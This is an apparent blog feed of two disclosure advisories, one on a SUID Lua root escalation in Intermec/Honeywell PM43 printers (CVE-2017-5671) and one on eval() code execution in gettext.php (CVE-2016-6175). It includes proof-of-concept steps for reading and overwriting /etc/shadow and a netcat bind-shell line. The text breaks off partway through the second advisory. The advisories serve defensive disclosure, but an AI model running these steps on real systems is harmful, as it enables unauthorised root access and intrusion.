tag:blogger.com,1999:blog-44576230801298478932024-09-06T02:09:44.957+02:00kmkz's blogJust another web blogkmkzhttp://www.blogger.com/profile/11354372095868320290noreply@blogger.comBlogger33125tag:blogger.com,1999:blog-4457623080129847893.post-18822013469000017132017-03-28T11:19:00.001+02:002017-03-29T10:44:43.655+02:00[Advisory] CVE-2017-5671 Intermec (Honeywell) RFID Industrial printers local root w/ Busybox Jailbreak<b># Date</b>: January 31th, 2017<br />
<b># Author</b>:<br />
Bourbon Jean-marie (kmkz) from AKERVA company | @kmkz_security<br />
<br />
<b># Product Homepage</b>: <br />
http://www.intermec.com/products/prtrpm43a/<br />
<br />
<b># Firmware download</b>: <br />
http://www.intermec.com/products/prtrpm43a/downloads.aspx<br />
<br />
<b># Tested on</b> :<br />
<u>model</u>: PM43 RFID Industrial printer <br />
f<u>irmware version</u>: 10.10.011406<br />
<u>kernel</u>: Linux PM43-xxxxxxx 2.6.31 #1 PREEMPT Mon Oct 26 10:49:59 SGT 2015 armv5tejl GNU/Linux<br />
<br />
<b># CVSS</b>: <span style="color: orange;"><b>7.5 </b></span>(CVSS:3.0/AV:L/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H)<br />
<b># OVE ID</b>: <span style="color: red;"><b>OVE-20170131-0001</b></span><br />
<b># CVE ID</b>: <b><span style="color: red;">CVE-2017-5671</span></b><br />
<b># VulnDB ID: 154533</b><br />
<br />
<b># Thanks</b>:<br />
Dany Bach (Rioru) from AKERVA company for the exploitation design during the pentest during which the CVE-2017-5671 was discovered | @DDXhunter<br />
<br />
Honeywell team which was really reactive (with special thanks to Kevin Staggs) !<br />
<br />
<b># Credits</b>:<br />
<a href="https://github.com/kmkz/exploit/blob/master/CVE-2017-5671-Credits.pdf" target="_blank">The security notification that Intermec (Honeywell) sent to all of their dealers </a><br />
<br />
<b># Additional link</b>:<br />
https://akerva.com/blog/intermec-industrial-printers-local-root-with-busybox-jailbreak/<br />
<br />
<b># Affected products</b>:<br />
PM23, PM42, PM43, PC23, PC43, PD43 and PC42 printers with versions prior to March 2017<br />
<br />
<b># Fixes</b>:<br />
Download the new firmware version by using this <a href="http://epsfiles.intermec.com/eps_files/eps_download/Firmware_P10.11.013310.zip" target="_blank">link</a><br />
<br />
<b># Release note</b>: <a href="http://apps.intermec.com/downloads/eps_download/Firmware%20Release%20Notes%20x10_11_013310.pdf" target="_blank">Here</a><br />
<br />
<div style="text-align: justify;">
<blockquote class="tr_bq">
<u><i><b>Intermec (Honeywell) Industrial RFID Printers Local root privilege escalation with Busybox jailbreak</b></i></u></blockquote>
</div>
<br />
<b>I. PRODUCT</b><br />
<br />
PM43/PM43c mid-range industrial RFID printers are ideal for a wide range of applications within the distribution center / warehouse and manufacturing environments.<br />
<br />
<b>II. ADVISORY</b><br />
<br />
Using a bad file permission, it is possible to gain full root privilege on a PM43 (but not only) RFID industrial printer as well as from the <i>admin</i> account as <i>it-admin</i> which are the two default users on the machine.<br />
It also permits to gain full privilege resulting on a Busybox jailbreak due to the root access on the system.<br />
<br />
The impact of this exploitation is quite critical due to the sensitive information that are available and impact the recent firmware version release (before March 12th 2017).<br />
<br />
<b>III. VULNERABILITY DESCRIPTION</b><br />
<br />
The Lua binary rights are too permissive and this one is SUID which conduct to perform this privilege escalation using a basic trick as describe in the next section.<br />
The default it-admin and/or admin credentials are available in the vendor's documentation and should be modified too.<br />
<br />
<b>IV. PROOF OF CONCEPT</b><br />
<br />
Following steps can reproduce the privilege escalation once the attacker gain a Busybox shell on the system:<br />
<br />
<br />
<span style="color: #073763;"><i>itadmin@PM43-XXXXXXXXXXX /tmp$ find / -perm -g=s -type f 2>/dev/null<br />/bin/busybox<br />/usr/bin/cfg<br />/usr/bin/lua <span style="color: black;">-></span> <span style="color: red;"><b>Lua binary with SUID perm.</b></span><br />/usr/bin/httpd_restore<br />/usr/bin/ikev2<br />/usr/bin/pwauth<br />/usr/bin/functest<br />/usr/bin/imecutil<br />/usr/bin/httpd_fwupgrade<br />/usr/sbin/setkey</i></span><br />
<br />
We then try to execute a shell command using Lua but it seems that this one is executed with non-root privileges through the Busybox shell:<br />
<br />
<i><span style="color: #073763;">itadmin@PM43-XXXXXXXXXXX /tmp$ /usr/bin/lua<br />Lua 5.1.4 Copyright (C) 1994-2008 Lua.org, PUC-Rio<br />> os.execute("id")<br />uid=1(itadmin) gid=1(itadmin) groups=1(itadmin),2(admin),3(user)</span></i><br />
<br />
So we identify that it is possible to read/write files with root privilege on the file system without any restrictions (we will be able to modify the shadow file in order to log in as root later):<br />
<br />
// in the Lua interpreter:<br />
<br />
<i><span style="color: #073763;">> f=io.open("/etc/shadow","rb")<br />> print(f)<br />file (0x17af0)<br />> c=f:read "*a"<br />> print(c)<br />root:!$1$XPCuiq25$IvWw/kKeomOyQIee8XfTb1:11851:0:99999:7:::<br />admin:$1$Ma/qTlIw$PPPTgRVCnkqcDQxjMBtsC0:11851:0:99999:7:::<br />itadmin:$1$kcHXJUjT$OIgLfTDgaEAlTbHRZFPsj.:11851:0:99999:7:::<br />user::11851:0:99999:7:::<br />ftp:*:11851:0:99999:7:::<br />nobody:*:11851:0:99999:7:::<br />lighttpd:x:1000:1000:Linux User,,,:/home/lighttpd:/bin/sh</span></i><br />
<br />
We conclude this "proof of concept" by writing a file on the filesystem which demonstrate the possibilities that we now have using this kind of code:<br />
<br />
<span style="color: #073763;"><i>fp = io.popen("akerva", "w")<br />fp:write(anything)<br />fp:close()</i></span><br />
<br />
That gave us the following output:<br />
<span style="color: #073763;"><br /></span>
<span style="color: #073763;"><i>itadmin@PM43-XXXXXXXXXXX /tmp$ cat akerva<br />AKERVA r00t<br />itadmin@PM43-XXXXXXXXXXX /tmp$ ls -alsh akerva<br /> 4 -rw-rw-r-- 1 root root 12 Jan 25 07:12 akerva</i></span><br />
<br />
As explained in the above text, we then over-writed the "etc/shadow" file and we validated that it is possible to gain full root access on the filesystem even if Busybox 1.15.0 (2009 release) were present, bypassing<br />
its shell restrictions (jailbreaking it).<br />
<br />
<b>V. RECOMMENDATIONS</b><br />
<br />
AKERVA's Pentesters recommended to fix it by modifying the Lua binary rights (is the SUID bit necessary?) which was done in the patched firmware.<br />
A security fix is now available in order to mitigate this issue as shown at the beginning of this advisory.<br />
<br />
<b>VI. VERSIONS AFFECTED</b><br />
<br />
This issue affects the firmware version 10.10.011406 but after reading the latest release notes it also seems to impact all versions that were released before the updated firmware.<br />
<br />
<b>VII. TIMELINE</b><br />
<br />
<u>January 19th, 2017</u>: Vulnerability identification<br />
<u>January 27th, 2017</u>: First contact with the editor (Honeywell)<br />
<u>January 31th, 2017</u>: Advisory submission to Honeywell security team and CVE id request<br />
<u>February 1st, 2017</u>: CVE id attributed by MITRE even if the vendor is not normally considered a priority for CVE by MITRE<br />
<u>February 6th, 2017</u>: Vendor confirm the vulnerability <br />
<u>February 16th, 2017</u>: Vendor inform that the fix is ready (They also proposed me to test it prior to release)<br />
<u>March 12th, 2017</u>: New firmware version available<br />
<u>March 28th, 2017</u>: Public advisory released<br />
<b><br />VIII. LEGAL NOTICES</b><br />
<br />
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.<br />
I accept no responsibility for any damage caused by the use or misuse of this advisory.kmkzhttp://www.blogger.com/profile/11354372095868320290noreply@blogger.com0tag:blogger.com,1999:blog-4457623080129847893.post-10652336559394281222016-07-25T13:34:00.001+02:002016-07-25T17:43:59.819+02:00[Advisory] CVE-2016-6175<style type="text/css">p { margin-bottom: 0.25cm; line-height: 120%; }a:link { }</style>
<br />
<div style="line-height: 100%; margin-bottom: 0cm;">
</div>
<div style="line-height: 100%; margin-bottom: 0cm;">
# <u><b>Title</b></u>: </div>
<div style="line-height: 100%; margin-bottom: 0cm;">
<b>g</b><b>ettext.</b><b>php</b><b> </b><b><= 1.0.12 </b><span lang="en-US"><b>unauthenticated </b></span><b>code
execution with </b><span style="color: red;"><b>POTENTIAL</b></span><b>
</b><b>privileges escalation</b>
</div>
<div style="line-height: 100%; margin-bottom: 0cm;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0cm;">
# <b>Date</b>: June
25th, 2016</div>
<div style="line-height: 100%; margin-bottom: 0cm;">
# <b>Author</b>:
kmkz (Bourbon Jean-marie) |
@kmkz_security</div>
<div style="line-height: 100%; margin-bottom: 0cm;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0cm;">
# <b>Project</b><b>
Homepage</b>: https://launchpad.net/php-gettext/</div>
<div style="line-height: 100%; margin-bottom: 0cm;">
# <b>Download</b>:
https://launchpad.net/php-gettext/trunk/1.0.12/+download/php-gettext-1.0.12.tar.gz</div>
<div style="line-height: 100%; margin-bottom: 0cm;">
# <b>Version</b>:
1.0.12 (latest release)</div>
<div style="line-height: 100%; margin-bottom: 0cm;">
# <b>Tested on</b>:
Linux Debian, PHP 5.6.19-2+b1</div>
<div style="line-height: 100%; margin-bottom: 0cm;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0cm;">
# <b>CVSS</b>: <span style="color: red;"><b>7.1</b></span><span style="color: red;">
</span>
</div>
<div style="line-height: 100%; margin-bottom: 0cm;">
# <b>CVE ID</b>:
<span style="color: red;"><b>CVE-2016-6175</b></span> </div>
<div style="line-height: 100%; margin-bottom: 0cm;">
# <b>OVE ID</b>:
<span style="color: red;"><b>OVE-20160705-0004</b></span></div>
<div style="line-height: 100%; margin-bottom: 0cm;">
# <b>OSVD</b><b>B
</b><b>ID</b>: n/a</div>
<div style="line-height: 100%; margin-bottom: 0cm;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0cm;">
# <u>Thanks</u>:</div>
<div style="line-height: 100%; margin-bottom: 0cm;">
<span style="font-style: normal;"><b>Lars Michelsen</b></span> from
NagVis project where this bug was discovered and <b>Danilo Segan</b><span style="font-weight: normal;">
from gettext.php team project </span><span style="font-weight: normal;">for
their reactivity and professionalism</span></div>
<div style="line-height: 100%; margin-bottom: 0cm;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0cm;">
# <b>Credits</b>:
</div>
<div style="line-height: 100%; margin-bottom: 0cm;">
<a href="https://github.com/NagVis/nagvis/commit/4fe8672a5aec3467da72b5852ca6d283c15adb53">https://github.com/NagVis/nagvis/commit/4fe8672a5aec3467da72b5852ca6d283c15adb53</a></div>
<div style="line-height: 100%; margin-bottom: 0cm;">
<a href="https://bugs.launchpad.net/php-gettext/+bug/1606184">https://bugs.launchpad.net/php-gettext/+bug/1606184</a></div>
<div style="line-height: 100%; margin-bottom: 0cm;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0cm;">
# <b>Fix</b><b>es</b>: </div>
<div style="line-height: 100%; margin-bottom: 0cm;">
<a href="https://github.com/NagVis/nagvis/blob/4fe8672a5aec3467da72b5852ca6d283c15adb53/share/serv">https://github.com/NagVis/nagvis/blob/4fe8672a5aec3467da72b5852ca6d283c15adb53/share/ser</a>ver/core/ext/php-gettext-1.0.12/gettext.php</div>
<div style="line-height: 100%; margin-bottom: 0cm;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0cm;">
<a href="https://bugs.launchpad.net/php-gettext/+bug/1606184">https://bugs.launchpad.net/php-gettext/+bug/1606184</a> </div>
<div style="line-height: 100%; margin-bottom: 0cm;">
<br /></div>
<div align="center" style="line-height: 100%; margin-bottom: 0cm;">
<b>g</b><b>ettext.php
<= 1.0.12 (latest) </b><b> local/remote code execution </b><b>with
</b><span style="color: red;"><b>POTENTIAL</b></span><b> </b><b>
</b><b>privileges escalation </b><b>issue</b></div>
<div align="center" style="line-height: 100%; margin-bottom: 0cm;">
<br /></div>
<div style="border-bottom: 1.05pt double #000000; border-left: none; border-right: none; border-top: none; line-height: 100%; margin-bottom: 0cm; padding-bottom: 0.07cm; padding-left: 0cm; padding-right: 0cm; padding-top: 0cm;">
I. APPLICATION</div>
<div style="line-height: 100%; margin-bottom: 0cm;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0cm;">
This library
provides PHP functions to read MO files even when gettext is not
compiled in or when appropriate locale is not present on the system.</div>
<div style="line-height: 100%; margin-bottom: 0cm;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0cm;">
This issue was
discovered by auditing Nagvis project source code, however NagVis is
not impacted by the following issue.</div>
<div style="line-height: 100%; margin-bottom: 0cm;">
<br /></div>
NagVis is a visualization addon for the well known network
managment system <a href="http://www.nagios.org/">Nagios</a>.<br />
NagVis can be used to visualize Nagios Data, e.g. to display IT
processes like a mail system or a network infrastructure.<br />
<div style="line-height: 100%; margin-bottom: 0cm;">
<br /></div>
<div style="border-bottom: 1.05pt double #000000; border-left: none; border-right: none; border-top: none; line-height: 100%; margin-bottom: 0cm; padding-bottom: 0.07cm; padding-left: 0cm; padding-right: 0cm; padding-top: 0cm;">
II. ADVISORY</div>
<div style="line-height: 100%; margin-bottom: 0cm;">
</div>
<div style="line-height: 100%; margin-bottom: 0cm;">
<br />
A possible remote
(or local) code execution were identified in the <b>gettext.php</b>
file allowing an attacker to gain access on the targeted host system
and/or gain application’s privileges throught<span lang="en-US"> a
specially crafted .mo language file.</span></div>
<div style="line-height: 100%; margin-bottom: 0cm;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0cm;">
<a href="https://www.blogger.com/null" name="result_box"></a>
The <b>$string</b> variable is not s<span lang="en-US">ufficiently
</span><span lang="en-US">sanitized</span><span lang="en-US"> </span><span lang="en-US">before
to be submitted to </span><span lang="en-US"><b>eval()</b></span><span lang="en-US">
function (which is dangerous) in </span><span lang="en-US"><b>select_string()</b></span><span lang="en-US">
function </span><span lang="en-US">causing the security issue.</span></div>
<div lang="en-US" style="line-height: 100%; margin-bottom: 0cm;">
<br /></div>
<div lang="en-US" style="border-bottom: 1.05pt double #000000; border-left: none; border-right: none; border-top: none; line-height: 100%; margin-bottom: 0cm; padding-bottom: 0.07cm; padding-left: 0cm; padding-right: 0cm; padding-top: 0cm;">
III. VULNERABILITY DESCRIPTION</div>
<div lang="en-US" style="line-height: 100%; margin-bottom: 0cm;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0cm;">
<span lang="en-US"><span style="font-weight: normal;">The
</span></span><span lang="en-US"><b>gettext_reader</b></span><span lang="en-US"><b>()
</b></span><span lang="en-US">funtion try to test magic number that
need to match with .mo files :</span></div>
<div lang="en-US" style="line-height: 100%; margin-bottom: 0cm;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0cm;">
<b>$MAGIC1 =
"\x95\x04\x12\xde";</b></div>
<div style="line-height: 100%; margin-bottom: 0cm;">
<b>$MAGIC2 =
"\xde\x12\x04\x95</b>";</div>
<div style="line-height: 100%; margin-bottom: 0cm;">
If it seems correct
then we’ll continue.</div>
<div style="line-height: 100%; margin-bottom: 0cm;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0cm;">
We then extract
forms from .mo file’s header through <b>get_plural_forms()</b>
function and check them with a <span style="color: red;"><u>deprecated</u></span><span style="color: red;">
</span>(<i>since php 5.3.0 </i><i>because it can be easily bypassed
by adding a Null Byte</i>) <span style="color: red;"><b>eregi()</b></span><span style="color: red;">
</span>regexp function in order to valid they match the following
pattern:</div>
<div align="center" style="line-height: 100%; margin-bottom: 0cm;">
<span style="color: #6666ff;"><i><b>plural-forms:
([^\n]*)\n</b></i></span></div>
<div align="center" style="font-style: normal; font-weight: normal; line-height: 100%; margin-bottom: 0cm;">
(This regular expression matching have no effect on our payload)</div>
<div style="font-style: normal; font-weight: normal; line-height: 100%; margin-bottom: 0cm;">
<br /></div>
<div style="font-style: normal; font-weight: normal; line-height: 100%; margin-bottom: 0cm;">
Next step will be to sanitize the obtained expression string before
to practice the fatal eval() on this one.</div>
<div style="font-style: normal; font-weight: normal; line-height: 100%; margin-bottom: 0cm;">
<br /></div>
<div style="font-style: normal; font-weight: normal; line-height: 100%; margin-bottom: 0cm;">
<br /></div>
<div style="font-style: normal; font-weight: normal; line-height: 100%; margin-bottom: 0cm;">
<br /></div>
<div style="font-style: normal; font-weight: normal; line-height: 100%; margin-bottom: 0cm;">
Here is the impacted code snippet :</div>
<div style="font-style: normal; font-weight: normal; line-height: 100%; margin-bottom: 0cm;">
<br /></div>
<div style="font-weight: normal; line-height: 100%; margin-bottom: 0cm;">
<i>snip...</i></div>
<div style="font-weight: normal; line-height: 100%; margin-bottom: 0cm;">
<span style="color: #6666ff;"> <i>if (eregi("plural-forms:
([^\n]*)\n", $header, $regs))</i></span></div>
<div style="font-weight: normal; line-height: 100%; margin-bottom: 0cm;">
<span style="color: #6666ff;"> <i>$expr = $regs[1];</i></span></div>
<div style="font-weight: normal; line-height: 100%; margin-bottom: 0cm;">
<span style="color: #6666ff;"> <i>else</i></span></div>
<div style="font-weight: normal; line-height: 100%; margin-bottom: 0cm;">
<span style="color: #6666ff;"> <i>$expr = "nplurals=2;
plural=n == 1 ? 0 : 1;";</i></span></div>
<div style="font-weight: normal; line-height: 100%; margin-bottom: 0cm;">
<br /></div>
<div style="font-weight: normal; line-height: 100%; margin-bottom: 0cm;">
<span style="color: #6666ff;"> </span><i><span style="color: #6666ff;"><span style="background: transparent;">$this->pluralheader
= $this→</span></span><span style="color: #cc0000;"><b><span style="background: transparent;">sanitize_plural_expression($expr)</span></b></span><span style="color: #ff0066;"><b><span style="background: transparent;">;</span></b></span><span style="background: transparent;">
</span></i><span style="font-style: normal;"><span style="background: transparent;">//
</span></span><span style="color: red;"><span style="font-style: normal;"><u><span style="background: transparent;">The
vulnerable function</span></u></span></span><span style="color: red;"><span style="font-style: normal;"><u><span style="background: transparent;">!!</span></u></span></span></div>
<div style="font-weight: normal; line-height: 100%; margin-bottom: 0cm;">
<span style="color: #b2b2b2;"> <i>}</i></span></div>
<div style="font-weight: normal; line-height: 100%; margin-bottom: 0cm;">
<i>snip…</i></div>
<div style="line-height: 100%; margin-bottom: 0cm;">
<br /></div>
<div style="font-style: normal; font-weight: normal; line-height: 100%; margin-bottom: 0cm;">
The comments presents at the beginning of
<b>sanitize_plural_expression()</b> function explain that this one is
here to prevent the <b>eval()</b> function attacks called later.</div>
<div style="font-style: normal; font-weight: normal; line-height: 100%; margin-bottom: 0cm;">
<br /></div>
<div style="font-style: normal; font-weight: normal; line-height: 100%; margin-bottom: 0cm;">
Comments are :</div>
<div align="center" style="font-weight: normal; line-height: 100%; margin-bottom: 0cm;">
<span style="color: #6666ff;"><i>/** Sanitize plural form expression for use
in PHP eval call. </i></span>
</div>
<div align="center" style="font-weight: normal; line-height: 100%; margin-bottom: 0cm;">
<span style="color: #6666ff;"> <i>@access private</i></span></div>
<div align="center" style="font-weight: normal; line-height: 100%; margin-bottom: 0cm;">
<span style="color: #6666ff;"> <i>@return string sanitized plural form
expression**/ </i></span></div>
<div style="font-style: normal; font-weight: normal; line-height: 100%; margin-bottom: 0cm;">
<br /></div>
<div style="font-style: normal; font-weight: normal; line-height: 100%; margin-bottom: 0cm;">
In fact, the security is guaranteed by a "preg_replace"
that not permit us to inject specials chars.</div>
<div style="font-style: normal; font-weight: normal; line-height: 100%; margin-bottom: 0cm;">
<br /></div>
<div style="font-weight: normal; line-height: 100%; margin-bottom: 0cm;">
<i>snip...</i></div>
<div style="font-style: normal; font-weight: normal; line-height: 100%; margin-bottom: 0cm;">
<span style="color: #6666ff;">function sanitize_plural_expression($expr) {</span><br />
</div>
<div style="font-style: normal; font-weight: normal; line-height: 100%; margin-bottom: 0cm;">
<span style="color: #6666ff;"> // Get rid of disallowed characters.</span></div>
<div style="font-style: normal; font-weight: normal; line-height: 100%; margin-bottom: 0cm;">
<span style="color: #6666ff;"> <span style="color: red;">$expr =
preg_replace('@[^a-zA-Z0-9_:;\(\)\?\|\&=!<>+*/\%-]@', '',
$expr); </span><span style="color: black;">// </span><span style="color: red;"><u>« sanitizer »</u></span></span><br />
</div>
<div style="font-style: normal; font-weight: normal; line-height: 100%; margin-bottom: 0cm;">
<span style="color: #6666ff;"> // Add parenthesis for tertiary '?'
operator.</span></div>
<div style="font-style: normal; font-weight: normal; line-height: 100%; margin-bottom: 0cm;">
<span style="color: #6666ff;"> $expr .= ';';</span></div>
<div style="font-style: normal; font-weight: normal; line-height: 100%; margin-bottom: 0cm;">
<span style="color: #6666ff;"> $res = '';</span></div>
<div style="font-style: normal; font-weight: normal; line-height: 100%; margin-bottom: 0cm;">
<span style="color: #6666ff;"> $p = 0;</span></div>
<div style="font-style: normal; font-weight: normal; line-height: 100%; margin-bottom: 0cm;">
<span style="color: #6666ff;"> for ($i = 0; $i < strlen($expr); $i++) {
<span style="color: black;">// no </span><span style="color: black;">indentation ?</span></span></div>
<div style="font-style: normal; font-weight: normal; line-height: 100%; margin-bottom: 0cm;">
<span style="color: #6666ff;"> $ch = $expr[$i];</span></div>
<div style="font-style: normal; font-weight: normal; line-height: 100%; margin-bottom: 0cm;">
<span style="color: #6666ff;"> switch ($ch) {</span></div>
<div style="font-style: normal; font-weight: normal; line-height: 100%; margin-bottom: 0cm;">
<span style="color: #6666ff;"> case '?':</span></div>
<div style="font-style: normal; font-weight: normal; line-height: 100%; margin-bottom: 0cm;">
<span style="color: #6666ff;"> $res .= ' ? (';</span></div>
<div style="font-style: normal; font-weight: normal; line-height: 100%; margin-bottom: 0cm;">
<span style="color: #6666ff;"> $p++;</span></div>
<div style="font-style: normal; font-weight: normal; line-height: 100%; margin-bottom: 0cm;">
<span style="color: #6666ff;"> break;</span></div>
<div style="font-style: normal; font-weight: normal; line-height: 100%; margin-bottom: 0cm;">
<span style="color: #6666ff;"> case ':':</span></div>
<div style="font-style: normal; font-weight: normal; line-height: 100%; margin-bottom: 0cm;">
<span style="color: #6666ff;"> $res .= ') : (';</span></div>
<div style="font-style: normal; font-weight: normal; line-height: 100%; margin-bottom: 0cm;">
<span style="color: #6666ff;"> break;</span></div>
<div style="font-style: normal; font-weight: normal; line-height: 100%; margin-bottom: 0cm;">
<span style="color: #6666ff;"> case ';':</span></div>
<div style="font-style: normal; font-weight: normal; line-height: 100%; margin-bottom: 0cm;">
<span style="color: #6666ff;"> $res .= str_repeat( ')', $p) . ';';</span></div>
<div style="font-style: normal; font-weight: normal; line-height: 100%; margin-bottom: 0cm;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://www.blogger.com/blogger.g?blogID=4457623080129847893" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"></a></div>
<span style="color: #6666ff;"> $p = 0;</span></div>
<div style="font-style: normal; font-weight: normal; line-height: 100%; margin-bottom: 0cm;">
<span style="color: #6666ff;"> break;</span></div>
<div style="font-style: normal; font-weight: normal; line-height: 100%; margin-bottom: 0cm;">
<span style="color: #6666ff;"> default:</span></div>
<div style="font-style: normal; font-weight: normal; line-height: 100%; margin-bottom: 0cm;">
<span style="color: #6666ff;"> $res .= $ch;</span></div>
<div style="font-style: normal; font-weight: normal; line-height: 100%; margin-bottom: 0cm;">
<span style="color: #6666ff;"> }</span></div>
<div style="font-style: normal; font-weight: normal; line-height: 100%; margin-bottom: 0cm;">
<span style="color: #6666ff;"> }</span></div>
<div style="font-style: normal; font-weight: normal; line-height: 100%; margin-bottom: 0cm;">
<span style="color: #6666ff;"> return $res;</span></div>
<div style="font-style: normal; font-weight: normal; line-height: 100%; margin-bottom: 0cm;">
<span style="color: #6666ff;"> }</span></div>
<div style="font-weight: normal; line-height: 100%; margin-bottom: 0cm;">
<i>snip...</i></div>
<div style="font-style: normal; font-weight: normal; line-height: 100%; margin-bottom: 0cm;">
<br /></div>
<div style="font-style: normal; font-weight: normal; line-height: 100%; margin-bottom: 0cm;">
Code snippet from the vulnerable function that execute eval() on the "sanitized" string :</div>
<div style="font-style: normal; font-weight: normal; line-height: 100%; margin-bottom: 0cm;">
<br /></div>
<div style="font-style: normal; font-weight: normal; line-height: 100%; margin-bottom: 0cm;">
<i>snip…</i></div>
<div style="font-style: normal; font-weight: normal; line-height: 100%; margin-bottom: 0cm;">
<span style="color: #6666ff;"> $string = $this->get_plural_forms();</span></div>
<div style="font-style: normal; font-weight: normal; line-height: 100%; margin-bottom: 0cm;">
<span style="color: #6666ff;"> $string =
str_replace('nplurals',"\$total",$string);</span></div>
<div style="font-style: normal; font-weight: normal; line-height: 100%; margin-bottom: 0cm;">
<span style="color: #6666ff;"> $string = str_replace("n",$n,$string);</span></div>
<div style="font-style: normal; font-weight: normal; line-height: 100%; margin-bottom: 0cm;">
<span style="color: #6666ff;"> $string =
str_replace('plural',"\$plural",$string);</span></div>
<div style="font-style: normal; font-weight: normal; line-height: 100%; margin-bottom: 0cm;">
<br /></div>
<div style="font-style: normal; font-weight: normal; line-height: 100%; margin-bottom: 0cm;">
<span style="color: #6666ff;"> $total = 0;</span></div>
<div style="font-style: normal; font-weight: normal; line-height: 100%; margin-bottom: 0cm;">
<span style="color: #6666ff;"> $plural = 0;</span></div>
<div style="font-style: normal; font-weight: normal; line-height: 100%; margin-bottom: 0cm;">
<br /></div>
<div style="font-style: normal; font-weight: normal; line-height: 100%; margin-bottom: 0cm;">
<span style="color: #6666ff;"> <span style="color: red;"> eval("$string");
// </span><span style="color: red;"><u>eval called</u></span><span style="color: red;">
…. launch my shell baby !</span></span></div>
<div style="font-style: normal; font-weight: normal; line-height: 100%; margin-bottom: 0cm;">
<i>snip…</i></div>
<div style="font-style: normal; font-weight: normal; line-height: 100%; margin-bottom: 0cm;">
<br /></div>
<div style="font-style: normal; font-weight: normal; line-height: 100%; margin-bottom: 0cm;">
However, for example (but not only!) we can call <b>system</b>()
function with « sh » parameter in order to launch a /bin/sh
command on the targeted system and allowing us to gain an interactive
shell with application privileges on it.</div>
<div style="font-style: normal; font-weight: normal; line-height: 100%; margin-bottom: 0cm;">
<br /></div>
<div style="font-style: normal; font-weight: normal; line-height: 100%; margin-bottom: 0cm;">
A real scenario could be that a real attacker overwrites languages
files located in the /nagvis-1.8.5/share/frontend/nagvis-js/locale/
directory, in an internal repository, a Docker shared folder or any
other folder.</div>
<div style="font-style: normal; font-weight: normal; line-height: 100%; margin-bottom: 0cm;">
<br /></div>
<div style="font-style: normal; font-weight: normal; line-height: 100%; margin-bottom: 0cm;">
He now just have to wait or to execute the payload himself to obtain
his shell, that’s why this vulnerability is not so harmless !</div>
<div style="font-style: normal; font-weight: normal; line-height: 100%; margin-bottom: 0cm;">
<br /></div>
<div style="font-style: normal; font-weight: normal; line-height: 100%; margin-bottom: 0cm;">
<u>Note</u> :</div>
<div style="font-weight: normal; line-height: 100%; margin-bottom: 0cm;">
<br /></div>
<div style="font-weight: normal; line-height: 100%; margin-bottom: 0cm;">
<span style="font-size: x-small;"><i>Apart from that we could
imagine that the attacker transform the <b>$expr</b> variable to
obtain an interactive remote shell without eval() and with (maybe)
more privileges like this :</i></span></div>
<div style="font-style: normal; line-height: 100%; margin-bottom: 0cm;">
<span style="font-size: x-small;"><i><span style="font-weight: normal;">$expr=
(`nc -l -p 1337 -e /bin/sh`); </span></i><b> </b><span style="font-weight: normal;">//
proof of concept and screenshots joined to this advisory</span></span></div>
<div style="font-style: normal; font-weight: normal; line-height: 100%; margin-bottom: 0cm;">
<br /></div>
<div align="center" style="font-style: normal; font-weight: normal; line-height: 100%; margin-bottom: 0cm;">
Like a Perl developer could say: « there is more than one way
to do it »</div>
<div style="border-bottom: 1.05pt double #000000; border-left: none; border-right: none; border-top: none; font-style: normal; font-weight: normal; line-height: 100%; margin-bottom: 0cm; padding-bottom: 0.07cm; padding-left: 0cm; padding-right: 0cm; padding-top: 0cm;">
IV. PROOF OF CONCEPT</div>
<div style="font-style: normal; font-weight: normal; line-height: 100%; margin-bottom: 0cm;">
<br /></div>
<div style="font-style: normal; font-weight: normal; line-height: 100%; margin-bottom: 0cm;">
Following PHP code reproduce the exploitation concept base on the
1.0.9 version</div>
<div style="font-style: normal; font-weight: normal; line-height: 100%; margin-bottom: 0cm;">
(without a crafted .mo file and joined with this advisory).</div>
<div style="font-style: normal; font-weight: normal; line-height: 100%; margin-bottom: 0cm;">
<br /></div>
<br />
<div style="font-style: normal; font-weight: normal; line-height: 100%; margin-bottom: 0cm;">
<a href="https://www.blogger.com/blogger.g?blogID=4457623080129847893" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"></a><br /></div>
<div style="border-bottom: 1.05pt double #000000; border-left: none; border-right: none; border-top: none; font-style: normal; font-weight: normal; line-height: 100%; margin-bottom: 0cm; padding-bottom: 0.07cm; padding-left: 0cm; padding-right: 0cm; padding-top: 0cm;">
<script src="//pastebin.com/embed_js/CAH9Zk2r"></script>
V. RECOMMENDATIONS</div>
<div style="font-style: normal; font-weight: normal; line-height: 100%; margin-bottom: 0cm;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0cm;">
As explained in the
associated « bug track », it was assumed that PO and MO files would
come from untrusted translators.</div>
<div style="line-height: 100%; margin-bottom: 0cm;">
Check the
permissions on PO/MO files in order to ensure the provenance and the
fact that is only accessible from trusted parties.</div>
<div style="line-height: 100%; margin-bottom: 0cm;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0cm;">
The project's
members are writing a new version that will patch this issue
definitively, thank you to respect their work and to apply this
temporary fix.</div>
<div style="font-style: normal; font-weight: normal; line-height: 100%; margin-bottom: 0cm;">
<br /></div>
<div style="font-style: normal; font-weight: normal; line-height: 100%; margin-bottom: 0cm;">
<br /></div>
<div style="border-bottom: 1.05pt double #000000; border-left: none; border-right: none; border-top: none; font-style: normal; font-weight: normal; line-height: 100%; margin-bottom: 0cm; padding-bottom: 0.07cm; padding-left: 0cm; padding-right: 0cm; padding-top: 0cm;">
VI. VERSIONS AFFECTED</div>
<div style="font-style: normal; font-weight: normal; line-height: 100%; margin-bottom: 0cm;">
<br /></div>
